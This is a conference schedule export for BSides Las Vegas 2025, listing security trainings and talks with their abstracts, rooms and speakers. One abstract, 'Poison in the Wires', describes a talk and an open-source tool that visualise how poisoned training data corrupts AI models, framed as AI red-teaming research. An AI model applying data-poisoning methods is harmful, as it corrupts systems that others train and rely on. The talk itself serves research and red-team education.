            <description>This training session emerges from the Idaho National Laboratory Cyber Informed Engineering project, a Department of Energy supported effort to improve system resilience and risk reduction through design efforts to include cyber risks alongside other engineering considered hazards. Previous versions of this course have been conducted using different specific engineering problems to local industry groups. This class is a product from those experiences. The diversity of the BSidesLV attendee base will make this class much more engaging than an industry specific audience.

Cyber-Informed Engineering (CIE) offers an opportunity to “engineer out” some cyber risk across the entire system lifecycle, starting from the earliest possible phases of conceptual design and requirements development and system design—the most optimal times to introduce mitigations against cyber risk. CIE is an emerging method to integrate cybersecurity risk considerations into the conception, design, development, and operation of any physical system that has digital connectivity, monitoring, or control. CIE uses design decisions and engineering controls to mitigate or even eliminate avenues for cyber-enabled attacks or reduce the consequences when an attack occurs. In the same way that engineers design systems for safety, engineers informed by CIE use similar methods to prevent or lessen the impact of a cyber-attack. CIE also allows the engineers to advise the approaches used by specialized Information Technology (IT) and Operational Technology (OT) cybersecurity experts to align cybersecurity mitigations to the most critical consequences identified by the engineers. 

What are the 12 principles of CIE?
1. Consequence-Focused Design 
2. Engineered Controls 
3. Secure Information Architecture 
4. Design Simplification 
5. Layered Defenses 
6. Active Defense 
7. Interdependency Evaluation 
8. Digital Asset Awareness 
9. Cyber-Secure Supply Chain Controls 
10. Planned Resilience 
11. Engineering Information Control 
12. Organizational Culture 

The purpose of the training is to help people understand how to use these principles during engineering design to design out many sources of cyber risk. The hands-on workshop engages participants in a journey that helps improve their skills in designing out issues that would later potentially affect cyber risk.

The session begins with a presentation of the principles for Cyber Informed Engineering and leads thoughts with an initiating question to prompt thoughts and actions for each principle. The scenario used to facilitate discussion is then presented, providing a template upon which the principles can then be addressed. The exercise then moves through the 12 principles where each is given an overview by one of the facilitators. What follows next is small group exercise tasks designed to facilitate the operationalization of each principle. The facilitators help the groups advance their discussion and learning. The training exercise concludes with a lessons-learned discussion.

References:
U.S. Department of Energy Office of Cybersecurity, Energy Security, and Emergency Response (CESER). Cyber Informed Engineering Implementation Guide. Version 1.0, August 7, 2023. https://www.osti.gov/biblio/1995796.
Technical Report: Cyber-Informed Engineering Workbook: CIE Hands-On Training. May 29, 2024. https://www.osti.gov/biblio/2371031.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/G33FLE/</url>
            <location>Opal</location>
            
            <attendee>Art Conklin</attendee>
            
            <attendee>Virginia “Ginger” Wright</attendee>
            
            <attendee>Andrew Ohrt</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RTRQJA@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RTRQJA</pentabarf:event-slug>
            <pentabarf:title>Building your own CA infrastructure on cheap HSMs</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend>20250804T143000</dtend>
            <duration>040000</duration>
            <summary>Building your own CA infrastructure on cheap HSMs</summary>
            <description>This workshop teaches people to create their own Root Certificate. The key is stored on a Yubikey. The certificate includes name constraints suitable for including in a system trust store, both in your k8s pods and user devices.

We then mint further name-constrained certificates used as online intermediates for each of user identity and pods. These intermediates can be stored online, or stored on their own HSMs.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RTRQJA/</url>
            <location>Emerald</location>
            
            <attendee>Mark Hahn</attendee>
            
            <attendee>Ted Hahn</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JELG8P@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JELG8P</pentabarf:event-slug>
            <pentabarf:title>Cyber Threat Landscaping Workshop</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>040000</duration>
            <summary>Cyber Threat Landscaping Workshop</summary>
            <description>In today&#x27;s digital age, cybersecurity is a critical concern for businesses and customers alike. Understanding and navigating the cyber threat landscape is essential for maintaining the integrity of your platforms and products. This workshop is designed to equip different business functions with the knowledge and tools necessary to analyze and update their threat landscapes, thereby enhancing our overall security posture and building greater trust with our customers. Participants will gain a solid foundation in cyber threat intelligence, including the identification of threat actors, tools, assets, and others. Participants will learn the significance of threat landscapes and how to effectively analyze and prioritize threats.
Attendees will be guided through the process of creating and updating their specific threat landscapes, incorporating best practices for continuous improvement and new intelligence. Through interactive discussions and group activities, participants will leave with a heightened sense of trust and be equipped to promote this trust within their teams, products, and the broader industry. Together, we can enhance your company&#x27;s reputation as a secure and trusted partner in the digital age.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JELG8P/</url>
            <location>Emerald</location>
            
            <attendee>Alexis Womble</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>QGYKQ3@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-QGYKQ3</pentabarf:event-slug>
            <pentabarf:title>Cybersecurity Roleplaying Training: Design &amp; Implement Engaging Incident Response Exercises</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend></dtend>
            <duration>040000</duration>
            <summary>Cybersecurity Roleplaying Training: Design &amp; Implement Engaging Incident Response Exercises</summary>
            <description>This intensive 4-hour workshop introduces cybersecurity professionals to an innovative roleplaying approach for incident response training. Moving beyond traditional tabletop exercises, participants will learn to design and implement dynamic scenarios that simulate the pressure, uncertainty, and collaborative decision-making required during real security incidents.

## Workshop Value Proposition

Traditional IR exercises often fail to create authentic crisis environments or fully engage technical staff. This workshop presents a solution through:

- Character-based roleplaying that builds cross-functional understanding
- Game mechanics that simulate the uncertainty of real incidents
- Dynamic scenarios that evolve based on team decisions
- Collaborative problem-solving under realistic time constraints

## Workshop Structure

### Foundations (1 hour)

After brief introductions, participants learn core incident response roleplaying mechanics including character roles, action resolution, and facilitation techniques. A live demonstration with volunteers showcases how these mechanics create realistic incident dynamics.

### Scenario Development (1 hour 15 minutes)

Participants learn IR scenario design principles focused on:

- Accurately representing attack patterns using MITRE ATT&amp;CK
- Creating realistic incident detection and investigation challenges
- Simulating stakeholder management during incidents
- Balancing technical accuracy with engaging gameplay

Small groups then generate incident scenarios tailored to specific IR challenges like ransomware response, data breaches, or insider threats.

### Hands-On Development (1 hour)

Groups develop detailed IR scenarios including:

- Escalation patterns reflecting real attacker behavior
- Decision points that test IR policies and procedures
- &quot;Injects&quot; simulating stakeholder demands and technical complications
- Round structures reflecting detection, containment, and recovery phases

### Implementation and Practice (30 minutes)

Groups exchange scenarios for brief playtesting, providing immediate feedback. Participants then develop implementation plans for their own organizations, addressing team size, technical skill variance, and integration with existing IR programs.

### Conclusion (15 minutes)

The workshop concludes with key takeaways and resources for continued development.

## IR Training Focus

This workshop specifically addresses common IR training challenges:

- Simulating the pressure of time-sensitive security decisions
- Practicing stakeholder communications during incidents
- Building cross-functional teamwork between technical and non-technical roles
- Testing incident playbooks in unexpected scenarios
- Creating safe environments to practice difficult decision-making
- Developing empathy for various roles in the incident response process

Participants leave with ready-to-implement IR scenarios designed to test and strengthen their organization&#x27;s incident response capabilities through engaging, realistic simulations that go beyond traditional tabletops.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/QGYKQ3/</url>
            <location>Diamond</location>
            
            <attendee>Klaus Agnoletti</attendee>
            
            <attendee>Glen Sorensen</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>J98WLE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-J98WLE</pentabarf:event-slug>
            <pentabarf:title>From Code to Cloud: Securing Your Stack with Open-Source Tools</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>040000</duration>
            <summary>From Code to Cloud: Securing Your Stack with Open-Source Tools</summary>
            <description>In a world where every Formula 1 team is backed by a security vendor, you might wonder: can open-source tools still compete—or are you just spinning your wheels?

This workshop is for the builders, breakers, and defenders who want practical answers—not just enterprise-grade promises wrapped in AI buzzwords. Modern applications are built fast, assembled from open-source packages, deployed via IaC, and run in complex cloud environments. Every step adds attack surface—and attackers know it.

But good security doesn’t have to start with a procurement call.

In this session, we’ll walk through how to build a high-quality, layered security program using open-source tools. You’ll see live demos of tools like:
- Trivy for container and dependency scanning (SCA),
- GitLeaks and TruffleHog for secrets detection (even buried in git history),
- Checkov for infrastructure-as-code scanning,
- ZAP and Nuclei for DAST and API testing,
- Bandit and OpenGrep for static analysis (SAST),
- And Zen for runtime protection via in-app firewalls.

Each tool will be shown in context—with real examples of how attackers exploit vulnerabilities in the wild: poisoned packages, typosquatting, exposed secrets, and cascading misconfigurations. We’ll explore famous breaches (like Log4Shell, EventStream, and Twitch’s git leak) and dissect how open-source tools could have detected or blocked the compromise.

You&#x27;ll learn how to:
- Chain these tools together with CI/CD pipelines, Git hooks, and IDEs,
- Choose when to “build vs. buy”,
- And design a Minimal Viable Security Stack that offers solid coverage without budget strain.

We’ll also cover the limitations of OSS tools—because yes, you’ll miss some dashboards, reporting, and support—but for many teams, those are trade-offs worth making. Especially when the alternative is no security at all.

This workshop is ideal for:
- Developers looking to shift security left without killing velocity,
- Security engineers who need effective, budget-conscious coverage,
- Startups and small teams who want the protection, not the pitch.

By the end, you’ll have a working blueprint, tool configurations, and clarity on what matters most. Whether you’re a lone dev or scaling a team, this session will give you the tactical toolkit to secure what you build—with tools the community trusts.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/J98WLE/</url>
            <location>Diamond</location>
            
            <attendee>Mackenzie Jackson</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>PET8DL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-PET8DL</pentabarf:event-slug>
            <pentabarf:title>Career Campaigns: A Tabletop RPG Workshop for Your Next Infosec Role, Monday AM</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend></dtend>
            <duration>040000</duration>
            <summary>Career Campaigns: A Tabletop RPG Workshop for Your Next Infosec Role, Monday AM</summary>
            <description>Join us for a tabletop roleplaying game (RPG) with real-world wins! Participant-players seeking their first role in cyber – or simply transitioning to a new specialization – will transform their current resume&#x27;s &quot;character sheet&quot; into a freshly reskilled or dual-classed hero, ready to take on any cybersecurity hiring process for your next infosec campaign.

“You&#x27;re new to these parts, traveler. Want to join a new infosec campaign party I’m forming? We’re defending the castle, and don’t have enough heroes to – wait. Where’s your sword?! You can’t defend with a *lute*!” 

Actually, you *can.* 

See, in 2023, I faced that same skepticism from infosec hiring managers: No IT or cyber background, so I clearly didn&#x27;t have what it took to be a cybersecurity professional. 

After a slew of rejections, I found some old 20-sided-dice… and I realized I needed to completely reframe my previous career. 

Now? I’m a threat intel analyst at a major insurance provider, helping my team translate technical research and controls into actionable recommendations for the business.

Let me show you how you, too, can pivot into information security during this three-hour RPG tabletop campaign-workshop.

I’ll guide participant-players through a modern infosec hiring process RPG tabletop “campaign” workshop, acting as the game master as participant-players reskill their classes and adjust their application strategies to win a coveted role for their infosec party. 

In the end, you’ll walk away with concrete research, tools, and techniques to help your next employer properly value and respect your current non-infosec skills and experience in your first (or next!) infosec role.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-8h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/PET8DL/</url>
            <location>Boardroom</location>
            
            <attendee>Stryker</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>XRWXY9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-XRWXY9</pentabarf:event-slug>
            <pentabarf:title>Career Campaigns: A Tabletop RPG Workshop for Your Next Infosec Role, Monday PM</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>040000</duration>
            <summary>Career Campaigns: A Tabletop RPG Workshop for Your Next Infosec Role, Monday PM</summary>
            <description>“You&#x27;re new to these parts, traveler. Want to join a new infosec campaign party I’m forming? We’re defending the castle, and don’t have enough heroes to – wait. Where’s your sword?! You can’t defend with a *lute*!” 

Actually, you *can.* 

See, in 2023, I faced that same skepticism from infosec hiring managers: No IT or cyber background, so I clearly didn&#x27;t have what it took to be a cybersecurity professional. 

After a slew of rejections, I found some old 20-sided-dice… and I realized I needed to completely reframe my previous career. 

Now? I’m a threat intel analyst at a major insurance provider, helping my team translate technical research and controls into actionable recommendations for the business.

Let me show you how you, too, can pivot into information security during this three-hour RPG tabletop campaign-workshop.

I’ll guide participant-players through a modern infosec hiring process RPG tabletop “campaign” workshop, acting as the game master as participant-players reskill their classes and adjust their application strategies to win a coveted role for their infosec party. 

In the end, you’ll walk away with concrete research, tools, and techniques to help your next employer properly value and respect your current non-infosec skills and experience in your first (or next!) infosec role.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-8h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/XRWXY9/</url>
            <location>Boardroom</location>
            
            <attendee>Stryker</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>B7DJJN@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-B7DJJN</pentabarf:event-slug>
            <pentabarf:title>Ask the Fed (Token 01)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T110000</dtend>
            <duration>010000</duration>
            <summary>Ask the Fed (Token 01)</summary>
            <description>N/A</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/B7DJJN/</url>
            <location>Misora</location>
            
            <attendee>Noah K</attendee>
            
            <attendee>Joel Max</attendee>
            
            <attendee>Tim Weston</attendee>
            
            <attendee>Matt</attendee>
            
            <attendee>Donald McFarlane</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>FKHVV8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-FKHVV8</pentabarf:event-slug>
            <pentabarf:title>The Botnet Strikes Back: how we assembled a coalition to take down a criminal network &amp; their all-out response (Token02)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T144500</dtend>
            <duration>004500</duration>
            <summary>The Botnet Strikes Back: how we assembled a coalition to take down a criminal network &amp; their all-out response (Token02)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/FKHVV8/</url>
            <location>Misora</location>
            
            <attendee>Ryan English</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>DLGT8N@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-DLGT8N</pentabarf:event-slug>
            <pentabarf:title>The Remote Grift: Cunning Meets Naivete, and the Victims Become the Criminals (Token 03)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T154500</dtend>
            <duration>004500</duration>
            <summary>The Remote Grift: Cunning Meets Naivete, and the Victims Become the Criminals (Token 03)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/DLGT8N/</url>
            <location>Misora</location>
            
            <attendee>Ira Victor</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>XNRJTZ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-XNRJTZ</pentabarf:event-slug>
            <pentabarf:title>Real Life Needs an ESP Overlay — So we Made One! (Token 04)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T160000</dtstart>
            <dtend>20250804T162000</dtend>
            <duration>002000</duration>
            <summary>Real Life Needs an ESP Overlay — So we Made One! (Token 04)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/XNRJTZ/</url>
            <location>Misora</location>
            
            <attendee>Alex Thines</attendee>
            
            <attendee>Brad &quot;Sno0ose&quot; Ammerman</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RWPBDF@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RWPBDF</pentabarf:event-slug>
            <pentabarf:title>Oh Hotel No!: How A Hopeless Hooligan Helped A Homie From Homeless To Homeowner In 9 Months (Token 05)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T174500</dtend>
            <duration>004500</duration>
            <summary>Oh Hotel No!: How A Hopeless Hooligan Helped A Homie From Homeless To Homeowner In 9 Months (Token 05)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RWPBDF/</url>
            <location>Misora</location>
            
            <attendee>Justin Varner</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>AQZJX7@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-AQZJX7</pentabarf:event-slug>
            <pentabarf:title>Indexing the Chaos: Extracting PII from Ransomware Leaks (Token 06)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T180000</dtstart>
            <dtend>20250804T184500</dtend>
            <duration>004500</duration>
            <summary>Indexing the Chaos: Extracting PII from Ransomware Leaks (Token 06)</summary>
            <description>HIBR was born out of frustration. Everyone’s talking about ransomware, but nobody wants to touch the fallout. I’m talking about the public dumps. The .7z files on sketchy TOR mirrors. The PDFs titled “contracts” that are actually scanned IDs from Ecuador to Estonia.

Most breach tools ignore these. They’re messy, hard to parse, and a legal migraine. So I built a system that does parse them, responsibly (as much as that’s possible), and answers one burning question: was my real-life data dumped by ransomware goons and forgotten?

We built:

    A crawler (breach.house) that grabs leaks from known ransomware groups, also breaches, stealer logs and leads.

    A processor that unzips the chaos, runs OCR over images, extracts text, and feeds it to an LLM trained to recognize personal data patterns (ID numbers, names, passport, driver license, SSN, etc).

    A frontend (haveibeenransom.com) that lets you search for your email or ID without ever exposing the raw data.

This talk will include:

    Real examples (redacted) of exposed IDs, tax files, and the dumbest things people name their internal folders.

    The tradeoffs between “public service” and “this might get me a GDPR fine.”

    A walkthrough of the tool, how it works, what it does well, and where it could go sideways.

This is the side of breach awareness people pretend isn’t there. We&#x27;re not pretending.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/AQZJX7/</url>
            <location>Misora</location>
            
            <attendee>Juanma</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RJXCQH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RJXCQH</pentabarf:event-slug>
            <pentabarf:title>Skytalks Reception</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T200000</dtstart>
            <dtend>20250804T220000</dtend>
            <duration>020000</duration>
            <summary>Skytalks Reception</summary>
            <description>Skytalks Reception</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RJXCQH/</url>
            <location>Suite 1702</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NMSLMR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NMSLMR</pentabarf:event-slug>
            <pentabarf:title>Morning Trainings, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend>20250804T143000</dtend>
            <duration>040000</duration>
            <summary>Morning Trainings, Monday</summary>
            <description>Morning Trainings, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NMSLMR/</url>
            <location>Foyer, Platinum Hotel Conference Center</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JDGG7P@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JDGG7P</pentabarf:event-slug>
            <pentabarf:title>Trainer Box Lunches Delivered, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T143000</dtstart>
            <dtend>20250804T143000</dtend>
            <duration>000000</duration>
            <summary>Trainer Box Lunches Delivered, Monday</summary>
            <description>Trainer Box Lunches Delivered, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JDGG7P/</url>
            <location>Foyer, Platinum Hotel Conference Center</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NJPLSK@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NJPLSK</pentabarf:event-slug>
            <pentabarf:title>Afternoon Trainings, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>040000</duration>
            <summary>Afternoon Trainings, Monday</summary>
            <description>Afternoon Trainings, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NJPLSK/</url>
            <location>Foyer, Platinum Hotel Conference Center</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>YGTMLX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-YGTMLX</pentabarf:event-slug>
            <pentabarf:title>Opening Remarks, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T093000</dtstart>
            <dtend>20250805T095500</dtend>
            <duration>002500</duration>
            <summary>Opening Remarks, Tuesday</summary>
            <description>Opening Remarks, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/YGTMLX/</url>
            <location>Florentine A</location>
            
            <attendee>milqtst</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RK9DQ9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RK9DQ9</pentabarf:event-slug>
            <pentabarf:title>Poison in the Wires: Interactive Network Visualization of Data Attacks</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T102000</dtend>
            <duration>002000</duration>
            <summary>Poison in the Wires: Interactive Network Visualization of Data Attacks</summary>
            <description>This talk branches off of my original research that I have been developing since August 2024. I have been researching data poisoning and also applying graph theory to cybersecurity. I developed this talk after speaking about theoretically visualizing poisoning networks. In this talk, I actually want to visualize poisoning training data with a custom GUI. After talking through some graph theory and data poisoning basics, I’ll show how poisoned training data messes with AI using an interactive network visualization tool I built. I wanted to emphasize how visualizing vulnerabilities makes it easier to understand and execute them, particularly in the AI red teaming space. The audience will see how bad data creates weird structures in graphs beyond just data differences. It’s like watching a model get hacked from the inside, but in a way you can actually see and explore. The tool is open source, works with local data, and helps make these attacks way more understandable (and fun to mess with). The talk is made for audiences who like machine learning, graphs, and red teaming, which, at its core, is just breaking things apart into smaller, more understandable pieces.
I enjoy being able to contribute a graphical perspective to hacking in general; I think that being able to visually represent an attack graphically and accurately can help make the vulnerability more interactive and easier to understand. I wanted to be able to show that AI models are as breakable as anything else, and a great way to show that is through visualization with networks.
https://youtu.be/7z6YAgggw-o?si=n5bhWkHmRlL76eCn</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RK9DQ9/</url>
            <location>Florentine A</location>
            
            <attendee>Maria Khodak</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>WKALMR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-WKALMR</pentabarf:event-slug>
            <pentabarf:title>Rusty pearls: Postgres RCE on cloud databases</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T105000</dtend>
            <duration>002000</duration>
            <summary>Rusty pearls: Postgres RCE on cloud databases</summary>
            <description>In this session, we will describe how an attempt to find a vulnerability in a popular IaaS provider led to the discovery of this issue and how we leveraged it along with several other bugs into an RCE. We will explain the operation of cloud-managed PostgreSQL and our approach to testing it. Additionally, we will present a series of vulnerabilities identified and discuss how exploitation of these techniques can be detected in AWS, other cloud providers, and databases that are not managed by a cloud provider. A demonstration of the vulnerability on a local instance will be provided, followed by a summary of takeaways related to using open-source code, shared responsibility models, and cloud security best practices.

We will bring our story, which was overall a challenging and exciting experience that ended with our database being blocked, and further collaboration with AWS.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/WKALMR/</url>
            <location>Florentine A</location>
            
            <attendee>Coby Abrams</attendee>
            
            <attendee>Tal Peleg</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TDYSX8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TDYSX8</pentabarf:event-slug>
            <pentabarf:title>No IP, No Problem: Exfiltrating Data Behind IAP</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T110000</dtstart>
            <dtend>20250805T112000</dtend>
            <duration>002000</duration>
            <summary>No IP, No Problem: Exfiltrating Data Behind IAP</summary>
            <description>This talk delivers a technical dive into Google Cloud’s IAP, a service widely used to enforce access controls on internal applications - and often assumed to be foolproof. We begin with a concise overview of how IAP works behind the scenes, including its identity enforcement model and how it integrates with IAM and backend services.

The goal of this talk isn’t just to highlight common misconfigurations and warn people not to repeat them, because plenty of blog posts already do that. Instead, the core focus is on teaching defenders how these misconfigurations manifest in logs once an attacker begins to exploit them, equipping them to build effective detections and stop breaches before they escalate. Whether it’s during the initial configuration tampering or while actively bypassing controls, I’ll walk through what those activities actually look like in GCP logs. For each misconfiguration, I’ll present real log snippets, unpack the most revealing details, and show how to correlate signals, even those outside of IAP-specific logs, to detect and investigate IAP abuse effectively.

